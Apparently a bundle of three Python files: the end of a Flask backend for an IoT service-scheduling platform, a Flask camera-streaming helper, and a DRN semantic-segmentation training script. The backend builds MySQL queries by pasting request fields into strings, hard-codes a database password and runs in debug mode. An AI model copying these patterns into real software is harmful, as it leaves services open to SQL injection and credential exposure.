req = requests.post(url="http://13.68.206.239:5053/schedule_service",json=response)
print("Scheduler requested to schedule serviceid "+serviceid)
#return json.loads(req.text)
return
class clearoutput(Resource):
def get(self):
return
def post(self):
recvd_params = request.get_json(force=True)
global kafkaDict
opcode = recvd_params["opinfo"]
params = opcode.split(";")
username = params[0]
appname = params[1]
servicename = params[2]
print("Clearing output for service "+servicename)
#create topic username_applicationname_servicename
topicname = username+"_"+appname+"_"+servicename
kafkaDict[topicname] = list()
class configedit(Resource):
def get(self):
return
def post(self):
print("rec req for edit config")
recvd_params = request.get_json(force=True)
username = recvd_params["username"]
concat = recvd_params["service"]
concat = concat.split("_")
appname = concat[0]
servicename = concat[1]
start = recvd_params["starttime"]
end = recvd_params["endtime"]
day = recvd_params["day"]
rec_scheduled = recvd_params["schtype"]
sensortype = recvd_params["sensortype"]
location = recvd_params["location"]
datarate = recvd_params["datarate"]
action = recvd_params["action"]
#create config
config_file_path = app.config['UPLOAD_FOLDER_APP'] + username+"/"+appname+"/"+"config.json"
print("Config file path = "+config_file_path)
file_json = open(config_file_path,"r")
config_data=json.load(file_json)
file_json.close()
serviceids = []
serviceid = None
for obj in config_data["Application"]["services"]:
serviceids.append(obj)
if config_data["Application"]["services"][obj]["servicename"] == servicename:
serviceid = obj
print("Service id set "+obj)
maximum = -1
for i in serviceids:
temp = i.split("-")
numb = temp[1]
numb = int(numb)
if numb > maximum:
maximum = numb
newnumber = maximum+1
newnumber = str(newnumber)
print("Maximum number is "+newnumber)
newservicename= "service-"+newnumber
print("new servicename "+newservicename)
src = app.config['UPLOAD_FOLDER_APP'] + username+"/"+appname+"/"+servicename+"/"
dst = app.config['UPLOAD_FOLDER_APP'] + username+"/"+appname+"/"+newservicename+"/"
shutil.copytree(src, dst)
copyofconfig = config_data["Application"]["services"][serviceid].copy()
copyofconfig["servicename"] = newservicename
temp1 = []
temp1.append(start)
copyofconfig["time"]["start"] = temp1
temp2 = []
temp2.append(end)
copyofconfig["time"]["end"] = temp2
temp3 = []
temp3.append(day)
copyofconfig["days"] =temp3
counter = 1
maindict = dict()
for i in location:
add = i.split("_")
area = add[0]
building = add[1]
room_no = add[2]
sensorid = "sensor"+str(counter)
counter = counter+1
geoloc = dict()
geoloc["lat"] = "None"
geoloc["long"] = "None"
address = dict()
address["area"] = area
address["building"] = building
address["room_no"] = room_no
proc = dict()
proc["data_rate"] = datarate
innerdict = dict()
innerdict["sensor_name"] = sensortype
innerdict["sensor_geolocation"] = geoloc
innerdict["sensor_address"] = address
innerdict["processing"] = proc
maindict[sensorid]=innerdict
copyofconfig["sensor"] = maindict
act = dict()
t1 = dict()
t1["value"] = "None"
act["Output_display_to_user"] = False
t3 = dict()
t3["message"] = "None"
t3["number"] = "None"
t4 = dict()
t4["To"] = "None"
t4["From"] = "iastiwari@gmail.com"
t4["Subject"] = "None"
t4["Text"] = "None"
if action == "displaytoadmin":
act["Output_display_to_user"] = True
elif action == "controlsensor":
t1["value"] = "None"
elif action == "email":
t4["To"] = recvd_params["email-to"]
t4["From"] = "iastiwari@gmail.com"
t4["Subject"] = recvd_params["email-subject"]
t4["Text"] = "None"
elif action=="sms":
t3["message"] = recvd_params["sms-subject"]
t3["number"] = recvd_params["sms-number"]
act["send_output_to_sensor"] = t1
act["Send_SMS"] = t3
act["Send_Email"] = t4
copyofconfig["action"] = act
copyofconfig["scheduled"] = rec_scheduled
#Handle the dependency part here
isdependency = recvd_params["dependent"]
if isdependency == "Yes":
number_of_dependencies = recvd_params["numdependency"]
deplist = list()
number_of_dependencies = number_of_dependencies + 1
for i in range(1,number_of_dependencies):
keyname = "dependcy"+str(i)
tsername = recvd_params[keyname]
tsername = tsername.split("_")
tsername = tsername[1]
deplist.append(tsername)
copyofconfig["dependency"] = deplist
print("$$$$$$$$$$$$$$$$$")
print("new copy of config is ")
print(copyofconfig)
#writing the changes here
config_data["Application"]["services"][newservicename] = copyofconfig
print("^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^")
print("New config is ")
print(config_data)
file_json = open(config_file_path,"w")
file_json.write(json.dumps(config_data,indent=4,sort_keys=True))
file_json.close()
#file written
all_services_dict = config_data["Application"]["services"].copy()
print("$$$$$$$$$$$$$$")
print(all_services_dict)
keysList = all_services_dict.keys()
keysList = list(keysList)
print("-----------------------------------------")
print(keysList)
for tserviceid in keysList:
if tserviceid != newservicename:
del all_services_dict[tserviceid]
mydb = mysql.connector.connect(host="localhost",user="admindb",passwd="password")
cursor = mydb.cursor(buffered=True)
query = "use "+DB_NAME
cursor.execute(query)
scheduled = config_data["Application"]["services"][serviceid]["scheduled"]
if scheduled == "True":
config_data["Application"]["services"] = all_services_dict
print("Sending to Jay")
print(config_data)
response = dict()
response["servicename"] = ""
response["config"] = config_data
response["action"] = ""
req = requests.post(url="http://13.68.206.239:5053/schedule_service",json=response)
query = "insert into "+UPLOADS_TABLE_NAME+" values(\""+username+"\",\""+appname+"\",\""+newservicename+"\",\""+newservicename+"\",\"Processing\",\""+scheduled+"\")"
print(query)
cursor.execute(query)
else:
print("Not scheduled. Normal update")
query = "insert into "+UPLOADS_TABLE_NAME+" values(\""+username+"\",\""+appname+"\",\""+newservicename+"\",\""+newservicename+"\",\"Stopped\",\""+scheduled+"\")"
print(query)
cursor.execute(query)
print("Starting kafka thread")
a_topic = username+"_"+appname+"_"+newservicename
global kafkaDict
kafkaDict[a_topic] = []
t1 = threading.Thread(target=kafkaThread,args=(a_topic,))
t1.start()
cursor.close()
mydb.commit()
mydb.close()
print("Config update Success")
return
class config_edit_resp(Resource):
def get(self):
return
def post(self):
recvd_params = request.get_json(force=True)
username = recvd_params["username"]
mydb = mysql.connector.connect(host="localhost",user="admindb",passwd="password")
cursor = mydb.cursor(buffered=True)
query = "use "+DB_NAME
cursor.execute(query)
#(username varchar(30), appname varchar(30), serviceid varchar(30),servicename varchar(50),
# status varchar(20), scheduled varchar(20))
appreqst = recvd_params["app"]
if appreqst == True:
appname = recvd_params["appname"]
query = "select appname,servicename from "+UPLOADS_TABLE_NAME+" where username=\""+username+"\" AND appname=\""+appname+"\""
cursor.execute(query)
values = []
for x in cursor:
appname = x[0]
servicename = x[1]
concat = appname+"_"+servicename
values.append(concat)
values = sorted(values)
cursor.close()
mydb.commit()
mydb.close()
return jsonify(services=values)
else:
query = "select appname,servicename from "+UPLOADS_TABLE_NAME+" where username=\""+username+"\""
cursor.execute(query)
values = []
for x in cursor:
appname = x[0]
servicename = x[1]
concat = appname+"_"+servicename
values.append(concat)
values = sorted(values)
cursor.close()
mydb.commit()
mydb.close()
return jsonify(services=values)
api.add_resource(login,'/authlogin')
api.add_resource(signup,'/authsignup')
api.add_resource(authorize,'/auth')
api.add_resource(request_manager_backend,'/req')
api.add_resource(output,'/outputlist')
api.add_resource(sendToScheduler,'/sendToScheduler')
api.add_resource(clearoutput,'/clearoutput')
api.add_resource(processUpload,'/processUpload')
api.add_resource(configedit,'/configEditReq')
api.add_resource(config_edit_resp,'/getServiceList')
def Updater():
print("Updater thread started")
while 1:
#UNCOMMENT THIS
mydb = mysql.connector.connect(host="localhost",user="admindb",passwd="password")
cursor = mydb.cursor(buffered=True)
query = "use "+DB_NAME
cursor.execute(query)
query = "select username from "+USER_TABLE_NAME
cursor.execute(query)
usernames = []
for x in cursor:
usernames.append(x[0])
for name in usernames:
# Neeraj
# print("####################### UPDATE REQUEST TO SERVICE LCM #####################")
requrl = "http://13.68.206.239:8080/servicelcm/service/topology/"+name
try:
resp = requests.get(requrl)
except requests.exceptions.Timeout:
# Maybe set up for a retry, or continue in a retry loop
time.sleep(30)
continue
#resp = requests.get(requrl)
# print(resp.text)
if resp.ok:
response = resp.json()
# print(response)
# print(type(response))
for block in response:
status = block["status"]
servicename = block["serviceName"]
appname = block["applicationName"]
tstatus = ""
if status == "alive":
tstatus = "Running"
elif status == "stopped" or status=="not working":
tstatus = "Stopped"
query = "update "+UPLOADS_TABLE_NAME+" set status=\""+tstatus+"\" where username=\""+name+"\" and appname=\""+appname+"\" and servicename=\""+servicename+"\""
# print("Updating for user "+name)
print(query)
cursor.execute(query)
# print("####################### UPDATE REQUEST TO SERVICE LCM ENDS HERE ###########")
cursor.close()
mydb.commit()
mydb.close()
time.sleep(3)
if __name__ == '__main__':
t1 = threading.Thread(target=Updater)
t1.start()
app.run(host=URL,port=PORT,debug=True)
|
base_camera.py
|
"""
This was originally pilfered from
https://github.com/adeept/Adeept_RaspTank/blob/a6c45e8cc7df620ad8977845eda2b839647d5a83/server/base_camera.py
Which looks like it was in turn pilfered from
https://blog.miguelgrinberg.com/post/flask-video-streaming-revisited
"Great artists steal". Thank you, @adeept and @miguelgrinberg!
"""
import time
import threading
import cv2
try:
from greenlet import getcurrent as get_ident
except ImportError:
try:
from thread import get_ident
except ImportError:
from _thread import get_ident
class CameraEvent(object):
"""An Event-like class that signals all active clients when a new frame is
available.
"""
def __init__(self):
self.events = {}
def wait(self):
"""Invoked from each client's thread to wait for the next frame."""
ident = get_ident()
if ident not in self.events:
# this is a new client
# add an entry for it in the self.events dict
# each entry has two elements, a threading.Event() and a timestamp
self.events[ident] = [threading.Event(), time.time()]
return self.events[ident][0].wait()
def set(self):
"""Invoked by the camera thread when a new frame is available."""
now = time.time()
remove = None
for ident, event in self.events.items():
if not event[0].isSet():
# if this client's event is not set, then set it
# also update the last set timestamp to now
event[0].set()
event[1] = now
else:
# if the client's event is already set, it means the client
# did not process a previous frame
# if the event stays set for more than 5 seconds, then assume
# the client is gone and remove it
if now - event[1] > 5:
remove = ident
if remove:
del self.events[remove]
def clear(self):
"""Invoked from each client's thread after a frame was processed."""
self.events[get_ident()][0].clear()
class BaseCamera(object):
thread = None # background thread that reads frames from camera
frame = None # current frame is stored here by background thread
last_access = 0 # time of last client access to the camera
frames_read = 0
started_at = 0
event = CameraEvent()
def __init__(self):
"""Start the background camera thread if it isn't running yet."""
if BaseCamera.thread is None:
BaseCamera.last_access = time.time()
# start background frame thread
BaseCamera.thread = threading.Thread(target=self._thread)
BaseCamera.thread.start()
# wait until frames are available
while self.get_frame() is None:
time.sleep(0)
def get_frame(self):
"""Return the current camera frame."""
BaseCamera.last_access = time.time()
# wait for a signal from the camera thread
BaseCamera.event.wait()
BaseCamera.event.clear()
return BaseCamera.frame
@staticmethod
def frames():
""""Generator that returns frames from the camera."""
raise RuntimeError('Must be implemented by subclasses.')
@classmethod
def _thread(cls):
"""Camera background thread."""
print('Starting camera thread.')
BaseCamera.started_at = time.time()
frames_iterator = cls.frames()
for frame in frames_iterator:
BaseCamera.frame = frame
BaseCamera.event.set() # send signal to clients
BaseCamera.frames_read += 1
time.sleep(0)
# if there hasn't been any clients asking for frames in
# the last 10 seconds then stop the thread
# if time.time() - BaseCamera.last_access > 10:
# frames_iterator.close()
# print('Stopping camera thread due to inactivity.')
# break
BaseCamera.thread = None
|
segment.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import argparse
import json
import logging
import math
import os
from os.path import exists, join, split
import threading
import time
import numpy as np
import shutil
import sys
from PIL import Image
import torch
from torch import nn
import torch.backends.cudnn as cudnn
import torch.optim as optim
from torchvision import datasets, transforms
from torch.autograd import Variable
import drn
import data_transforms as transforms
try:
from modules import batchnormsync
except ImportError:
pass
FORMAT = "[%(asctime)-15s %(filename)s:%(lineno)d %(funcName)s] %(message)s"
logging.basicConfig(format=FORMAT)
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
CITYSCAPE_PALETTE = np.asarray([
[128, 64, 128],
[244, 35, 232],
[70, 70, 70],
[102, 102, 156],
[190, 153, 153],
[153, 153, 153],
[250, 170, 30],
[220, 220, 0],
[107, 142, 35],
[152, 251, 152],
[70, 130, 180],
[220, 20, 60],
[255, 0, 0],
[0, 0, 142],
[0, 0, 70],
[0, 60, 100],
[0, 80, 100],
[0, 0, 230],
[119, 11, 32],
[0, 0, 0]], dtype=np.uint8)
TRIPLET_PALETTE = np.asarray([
[0, 0, 0, 255],
[217, 83, 79, 255],
[91, 192, 222, 255]], dtype=np.uint8)
def fill_up_weights(up):
w = up.weight.data
f = math.ceil(w.size(2) / 2)
c = (2 * f - 1 - f % 2) / (2. * f)
for i in range(w.size(2)):
for j in range(w.size(3)):
w[0, 0, i, j] = \
(1 - math.fabs(i / f - c)) * (1 - math.fabs(j / f - c))
for c in range(1, w.size(0)):
w[c, 0, :, :] = w[0, 0, :, :]
class DRNSeg(nn.Module):
def __init__(self, model_name, classes, pretrained_model=None,
pretrained=True, use_torch_up=False):
super(DRNSeg, self).__init__()
model = drn.__dict__.get(model_name)(
pretrained=pretrained, num_classes=1000)
pmodel = nn.DataParallel(model)
if pretrained_model is not None:
pmodel.load_state_dict(pretrained_model)
self.base = nn.Sequential(*list(model.children())[:-2])
self.seg = nn.Conv2d(model.out_dim, classes,
kernel_size=1, bias=True)
self.softmax = nn.LogSoftmax()
m = self.seg
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
m.bias.data.zero_()
if use_torch_up:
self.up = nn.UpsamplingBilinear2d(scale_factor=8)
else:
up = nn.ConvTranspose2d(classes, classes, 16, stride=8, padding=4,
output_padding=0, groups=classes,
bias=False)
fill_up_weights(up)
up.weight.requires_grad = False
self.up = up
def forward(self, x):
x = self.base(x)
x = self.seg(x)
y = self.up(x)
return self.softmax(y), x
def optim_parameters(self, memo=None):
for param in self.base.parameters():
yield param
for param in self.seg.parameters():
yield param
class SegList(torch.utils.data.Dataset):
def __init__(self, data_dir, phase, transforms, list_dir=None,
out_name=False):
self.list_dir = data_dir if list_dir is None else list_dir
self.data_dir = data_dir
self.out_name = out_name
self.phase = phase
self.transforms = transforms
self.image_list = None
self.label_list = None
self.bbox_list = None
self.read_lists()
def __getitem__(self, index):
data = [Image.open(join(self.data_dir, self.image_list[index]))]
if self.label_list is not None:
data.append(Image.open(
join(self.data_dir, self.label_list[index])))
data = list(self.transforms(*data))
if self.out_name:
if self.label_list is None:
data.append(data[0][0, :, :])
data.append(self.image_list[index])
return tuple(data)
def __len__(self):
return len(self.image_list)
def read_lists(self):
image_path = join(self.list_dir, self.phase + '_images.txt')
label_path = join(self.list_dir, self.phase + '_labels.txt')
assert exists(image_path)
self.image_list = [line.strip() for line in open(image_path, 'r')]
if exists(label_path):
self.label_list = [line.strip() for line in open(label_path, 'r')]
assert len(self.image_list) == len(self.label_list)
class SegListMS(torch.utils.data.Dataset):
def __init__(self, data_dir, phase, transforms, scales, list_dir=None):
self.list_dir = data_dir if list_dir is None else list_dir
self.data_dir = data_dir
self.phase = phase
self.transforms = transforms
self.image_list = None
self.label_list = None
self.bbox_list = None
self.read_lists()
self.scales = scales
def __getitem__(self, index):
data = [Image.open(join(self.data_dir, self.image_list[index]))]
w, h = data[0].size
if self.label_list is not None:
data.append(Image.open(
join(self.data_dir, self.label_list[index])))
# data = list(self.transforms(*data))
out_data = list(self.transforms(*data))
ms_images = [self.transforms(data[0].resize((int(w * s), int(h * s)),
Image.BICUBIC))[0]
for s in self.scales]
out_data.append(self.image_list[index])
out_data.extend(ms_images)
return tuple(out_data)
def __len__(self):
return len(self.image_list)
def read_lists(self):
image_path = join(self.list_dir, self.phase + '_images.txt')
label_path = join(self.list_dir, self.phase + '_labels.txt')
assert exists(image_path)
self.image_list = [line.strip() for line in open(image_path, 'r')]
if exists(label_path):
self.label_list = [line.strip() for line in open(label_path, 'r')]
assert len(self.image_list) == len(self.label_list)
def validate(val_loader, model, criterion, eval_score=None, print_freq=10):
batch_time = AverageMeter()
losses = AverageMeter()
score = AverageMeter()
# switch to evaluate mode
model.eval()
end = time.time()
for i, (input, target) in enumerate(val_loader):
if type(criterion) in [torch.nn.modules.loss.L1Loss,
torch.nn.modules.loss.MSELoss]:
target = target.float()
input = input.cuda()
target = target.cuda(async=True)
with torch.no_grad():
input_var = torch.autograd.Variable(input)
target_var = torch.autograd.Variable(target)
# compute output
output = model(input_var)[0]
loss = criterion(output, target_var)
# measure accuracy and record loss
# prec1, prec5 = accuracy(output.data, target, topk=(1, 5))
losses.update(loss.data, input.size(0))
if eval_score is not None:
score.update(eval_score(output, target_var), input.size(0))
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if i % print_freq == 0:
logger.info('Test: [{0}/{1}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Score {score.val:.3f} ({score.avg:.3f})'.format(
i, len(val_loader), batch_time=batch_time, loss=losses,
score=score))
logger.info(' * Score {top1.avg:.3f}'.format(top1=score))
return score.avg
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def accuracy(output, target):
"""Computes the precision@k for the specified values of k"""
# batch_size = target.size(0) * target.size(1) * target.size(2)
_, pred = output.max(1)
pred = pred.view(1, -1)
target = target.view(1, -1)
correct = pred.eq(target)
correct = correct[target != 255]
correct = correct.view(-1)
score = correct.float().sum(0).mul(100.0 / correct.size(0))
return score.data
def train(train_loader, model, criterion, optimizer, epoch,
eval_score=None, print_freq=10):
batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
scores = AverageMeter()
# switch to train mode
model.train()
end = time.time()
for i, (input, target) in enumerate(train_loader):
# measure data loading time
data_time.update(time.time() - end)
if type(criterion) in [torch.nn.modules.loss.L1Loss,
torch.nn.modules.loss.MSELoss]:
target = target.float()
input = input.cuda()
target = target.cuda(async=True)
input_var = torch.autograd.Variable(input)
target_var = torch.autograd.Variable(target)
# compute output
output = model(input_var)[0]
loss = criterion(output, target_var)
# measure accuracy and record loss
# prec1, prec5 = accuracy(output.data, target, topk=(1, 5))
losses.update(loss.data, input.size(0))
if eval_score is not None:
scores.update(eval_score(output, target_var), input.size(0))
# compute gradient and do SGD step
optimizer.zero_grad()
loss.backward()
optimizer.step()
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if i % print_freq == 0:
logger.info('Epoch: [{0}][{1}/{2}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Data {data_time.val:.3f} ({data_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Score {top1.val:.3f} ({top1.avg:.3f})'.format(
epoch, i, len(train_loader), batch_time=batch_time,
data_time=data_time, loss=losses, top1=scores))
def save_checkpoint(state, is_best, filename='checkpoint.pth.tar'):
torch.save(state, filename)
if is_best:
shutil.copyfile(filename, 'model_best.pth.tar')
def train_seg(args):
batch_size = args.batch_size
num_workers = args.workers
crop_size = args.crop_size
print(' '.join(sys.argv))
for k, v in args.__dict__.items():
print(k, ':', v)
single_model = DRNSeg(args.arch, args.classes, None,
pretrained=True)
if args.pretrained:
single_model.load_state_dict(torch.load(args.pretrained))
model = torch.nn.DataParallel(single_model).cuda()
criterion = nn.NLLLoss2d(ignore_index=255)
criterion.cuda()
# Data loading code
data_dir = args.data_dir
info = json.load(open(join(data_dir, 'info.json'), 'r'))
normalize = transforms.Normalize(mean=info['mean'],
std=info['std'])
t = []
if args.random_rotate > 0:
t.append(transforms.RandomRotate(args.random_rotate))
if args.random_scale > 0:
t.append(transforms.RandomScale(args.random_scale))
t.extend([transforms.RandomCrop(crop_size),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
normalize])
train_loader = torch.utils.data.DataLoader(
SegList(data_dir, 'train', transforms.Compose(t),
list_dir=args.list_dir),
batch_size=batch_size, shuffle=True, num_workers=num_workers,
pin_memory=True, drop_last=True
)
val_loader = torch.utils.data.DataLoader(
SegList(data_dir, 'val', transforms.Compose([
transforms.RandomCrop(crop_size),
transforms.ToTensor(),
normalize,
]), list_dir=args.list_dir),
batch_size=batch_size, shuffle=False, num_workers=num_workers,
pin_memory=True, drop_last=True
)
# define loss function (criterion) and pptimizer
optimizer = torch.optim.SGD(single_model.optim_parameters(),
args.lr,
momentum=args.momentum,
weight_decay=args.weight_decay)
cudnn.benchmark = True
best_prec1 = 0
start_epoch = 0
# optionally resume from a checkpoint
if args.resume:
if os.path.isfile(args.resume):
print("=> loading checkpoint '{}'".format(args.resume))
checkpoint = torch.load(args.resume)
start_epoch = checkpoint['epoch']
best_prec1 = checkpoint['best_prec1']
model.load_state_dict(checkpoint['state_dict'])
print("=> loaded checkpoint '{}' (epoch {})"
.format(args.resume, checkpoint['epoch']))
else:
print("=> no checkpoint found at '{}'".format(args.resume))
if args.evaluate:
validate(val_loader, model, criterion, eval_score=accuracy)
return
for epoch in range(start_epoch, args.epochs):
lr = adjust_learning_rate(args, optimizer, epoch)
logger.info('Epoch: [{0}]\tlr {1:.06f}'.format(epoch, lr))
# train for one epoch
train(train_loader, model, criterion, optimizer, epoch,
eval_score=accuracy)
# evaluate on validation set
prec1 = validate(val_loader, model, criterion, eval_score=accuracy)
is_best = prec1 > best_prec1
best_prec1 = max(prec1, best_prec1)
checkpoint_path = os.path.join(args.save_path, 'checkpoint_latest.pth.tar')
save_checkpoint({
'epoch': epoch + 1,
'arch': args.arch,
'state_dict': model.state_dict(),
'best_prec1': best_prec1,
}, is_best, filename=checkpoint_path)
if (epoch + 1) % args.save_iter == 0:
history_path = os.path.join(args.save_path, 'checkpoint_{:03d}.pth.tar'.format(epoch + 1))
shutil.copyfile(checkpoint_path, history_path)
def adjust_learning_rate(args, optimizer, epoch):
"""
Sets the learning rate to the initial LR decayed by 10 every 30 epochs
"""
if args.lr_mode == 'step':
lr = args.lr * (0.1 ** (epoch // args.step))
elif args.lr_mode == 'poly':
lr = args.lr * (1 - epoch / args.epochs) ** 0.9
else:
raise ValueError('Unknown lr mode {}'.format(args.lr_mode))
for param_group in optimizer.param_groups:
param_group['lr'] = lr
return lr
def fast_hist(pred, label, n):
k = (label >= 0) & (label < n)
return np.bincount(
n * label[k].astype(int) + pred[k], minlength=n ** 2).reshape(n, n)
def per_class_iu(hist):
return np.diag(hist) / (hist.sum(1) + hist.sum(0) - np.diag(hist))
def save_output_images(predictions, filenames, output_dir):
"""
Saves a given (B x C x H x W) into an image file.
If given a mini-batch tensor, will save the tensor as a grid of images.
"""
# pdb.set_trace()
for ind in range(len(filenames)):
im = Image.fromarray(predictions[ind].astype(np.uint8))
fn = os.path.join(output_dir, 'LABELS', filenames[ind][:-4].split("/")[-1] + '_trainIds.png')
out_dir = split(fn)[0]
if not exists(out_dir):
os.makedirs(out_dir)
im.save(fn)
def save_colorful_images(predictions, filenames, output_dir, palettes):
"""
Saves a given (B x C x H x W) into an image file.
If given a mini-batch tensor, will save the tensor as a grid of images.
"""
for ind in range(len(filenames)):
im = Image.fromarray(palettes[predictions[ind].squeeze()])
fn = os.path.join(output_dir, 'COLOR', filenames[ind][:-4].split("/")[-1] + '.png')
out_dir = split(fn)[0]
if not exists(out_dir):
os.makedirs(out_dir)
im.save(fn)
def test(eval_data_loader, model, num_classes,
output_dir='pred', has_gt=True, save_vis=False):
model.eval()
batch_time = AverageMeter()
data_time = AverageMeter()
end = time.time()
hist = np.zeros((num_classes, num_classes))
for iter, (image, label, name) in enumerate(eval_data_loader):
data_time.update(time.time() - end)
with torch.no_grad():
image_var = Variable(image, requires_grad=False)
final = model(image_var)[0]
_, pred = torch.max(final, 1)
pred = pred.cpu().data.numpy()
batch_time.update(time.time() - end)
if save_vis:
save_output_images(pred, name, output_dir)
save_colorful_images(
pred, name, output_dir,
TRIPLET_PALETTE if num_classes == 3 else CITYSCAPE_PALETTE)
if has_gt:
label = label.numpy()
hist += fast_hist(pred.flatten(), label.flatten(), num_classes)
logger.info('===> mAP {mAP:.3f}'.format(
mAP=round(np.nanmean(per_class_iu(hist)) * 100, 2)))
end = time.time()
logger.info('Eval: [{0}/{1}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Data {data_time.val:.3f} ({data_time.avg:.3f})\t'
.format(iter, len(eval_data_loader), batch_time=batch_time,
data_time=data_time))
if has_gt: #val
ious = per_class_iu(hist) * 100
logger.info(' '.join('{:.03f}'.format(i) for i in ious))
return round(np.nanmean(ious), 2)
def resize_4d_tensor(tensor, width, height):
tensor_cpu = tensor.cpu().numpy()
if tensor.size(2) == height and tensor.size(3) == width:
return tensor_cpu
out_size = (tensor.size(0), tensor.size(1), height, width)
out = np.empty(out_size, dtype=np.float32)
def resize_one(i, j):
out[i, j] = np.array(
Image.fromarray(tensor_cpu[i, j]).resize(
(width, height), Image.BILINEAR))
def resize_channel(j):
for i in range(tensor.size(0)):
out[i, j] = np.array(
Image.fromarray(tensor_cpu[i, j]).resize(
(width, height), Image.BILINEAR))
# workers = [threading.Thread(target=resize_one, args=(i, j))
# for i in range(tensor.size(0)) for j in range(tensor.size(1))]
workers = [threading.Thread(target=resize_channel, args=(j,))
for j in range(tensor.size(1))]
for w in workers:
w.start()
for w in workers:
w.join()
# for i in range(tensor.size(0)):
# for j in range(tensor.size(1)):
# out[i, j] = np.array(
# Image.fromarray(tensor_cpu[i, j]).resize(
# (w, h), Image.BILINEAR))
# out = tensor.new().resize_(*out.shape).copy_(torch.from_numpy(out))
return out
def test_ms(eval_data_loader, model, num_classes, scales,
output_dir='pred', has_gt=True, save_vis=False):
model.eval()
batch_time = AverageMeter()
data_time = AverageMeter()
end = time.time()
hist = np.zeros((num_classes, num_classes))
num_scales = len(scales)
for iter, input_data in enumerate(eval_data_loader):
data_time.update(time.time() - end)
if has_gt:
name = input_data[2]
label = input_data[1]
else:
name = input_data[1]
h, w = input_data[0].size()[2:4]
images = [input_data[0]]
images.extend(input_data[-num_scales:])
# pdb.set_trace()
outputs = []
for image in images:
with torch.no_grad():
image_var = Variable(image, requires_grad=False)
final = model(image_var)[0]
outputs.append(final.data)
final = sum([resize_4d_tensor(out, w, h) for out in outputs])
# _, pred = torch.max(torch.from_numpy(final), 1)
# pred = pred.cpu().numpy()
pred = final.argmax(axis=1)
batch_time.update(time.time() - end)
if save_vis:
save_output_images(pred, name, output_dir)
save_colorful_images(pred, name, output_dir + '_color',
CITYSCAPE_PALETTE)
if has_gt:
label = label.numpy()
hist += fast_hist(pred.flatten(), label.flatten(), num_classes)
logger.info('===> mAP {mAP:.3f}'.format(
mAP=round(np.nanmean(per_class_iu(hist)) * 100, 2)))
end = time.time()
logger.info('Eval: [{0}/{1}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Data {data_time.val:.3f} ({data_time.avg:.3f})\t'
.format(iter, len(eval_data_loader), batch_time=batch_time,
data_time=data_time))
if has_gt: #val
ious = per_class_iu(hist) * 100
logger.info(' '.join('{:.03f}'.format(i) for i in ious))
return round(np.nanmean(ious), 2)
def test_seg(args):
batch_size = args.batch_size
num_workers = args.workers
phase = args.phase
for k, v in args.__dict__.items():
print(k, ':', v)
single_model = DRNSeg(args.arch, args.classes, pretrained_model=None,
pretrained=False)
if args.pretrained:
single_model.load_state_dict(torch.load(args.pretrained))
model = torch.nn.DataParallel(single_model).cuda()
data_dir = args.data_dir
info = json.load(open(join(data_dir, 'info.json'), 'r'))
normalize = transforms.Normalize(mean=info['mean'], std=info['std'])
scales = [0.5, 0.75, 1.25, 1.5, 1.75]
if args.ms:
dataset = SegListMS(data_dir, phase, transforms.Compose([
transforms.ToTensor(),
normalize,
]), scales, list_dir=args.list_dir)
else:
dataset = SegList(data_dir, phase, transforms.Compose([
transforms.ToTensor(),
normalize,
]), list_dir=args.list_dir, out_name=True)
test_loader = torch.utils.data.DataLoader(
dataset,
batch_size=batch_size, shuffle=False, num_workers=num_workers,
pin_memory=False
)
cudnn.benchmark = True
# optionally resume from a checkpoint
start_epoch = 0
if args.resume:
if os.path.isfile(args.resume):
logger.info("=> loading checkpoint '{}'".format(args.resume))
checkpoint = torch.load(args.resume)
start_epoch = checkpoint['epoch']
best_prec1 = checkpoint['best_prec1']
model.load_state_dict(checkpoint['state_dict'])
logger.info("=> loaded checkpoint '{}' (epoch {})"
.format(args.resume, checkpoint['epoch']))
else:
logger.info("=> no checkpoint found at '{}'".format(args.resume))
# out_dir = '{}_{:03d}_{}'.format(args.arch, start_epoch, phase)
out_dir = args.save_path
if len(args.test_suffix) > 0:
out_dir += '/' + args.test_suffix
if args.ms:
out_dir += '_ms'
if args.ms:
mAP = test_ms(test_loader, model, args.classes, save_vis=True,
has_gt=phase != 'test' or args.with_gt,
output_dir=out_dir,
scales=scales)
else:
mAP = test(test_loader, model, args.classes, save_vis=True,
has_gt=phase != 'test' or args.with_gt, output_dir=out_dir)
if mAP is not None:
logger.info('mAP: %f', mAP)
def parse_args():
# Training settings
parser = argparse.ArgumentParser(description='')
parser.add_argument('cmd', choices=['train', 'test'])
parser.add_argument('-d', '--data-dir', default=None, required=True)
parser.add_argument('-l', '--list-dir', default=None,
help='List dir to look for train_images.txt etc. '
'It is the same with --data-dir if not set.')
parser.add_argument('-c', '--classes', default=0, type=int)
parser.add_argument('-s', '--crop-size', default=0, type=int)
parser.add_argument('--step', type=int, default=200)
parser.add_argument('--arch')
parser.add_argument('--batch-size', type=int, default=64, metavar='N',
help='input batch size for training (default: 64)')
parser.add_argument('--epochs', type=int, default=10, metavar='N',
help='number of epochs to train (default: 10)')
parser.add_argument('--lr', type=float, default=0.01, metavar='LR',
help='learning rate (default: 0.01)')
parser.add_argument('--lr-mode', type=str, default='step')
parser.add_argument('--momentum', type=float, default=0.9, metavar='M',
help='SGD momentum (default: 0.9)')
parser.add_argument('--weight-decay', '--wd', default=1e-4, type=float,
metavar='W', help='weight decay (default: 1e-4)')
parser.add_argument('-e', '--evaluate', dest='evaluate',
action='store_true',
help='evaluate model on validation set')
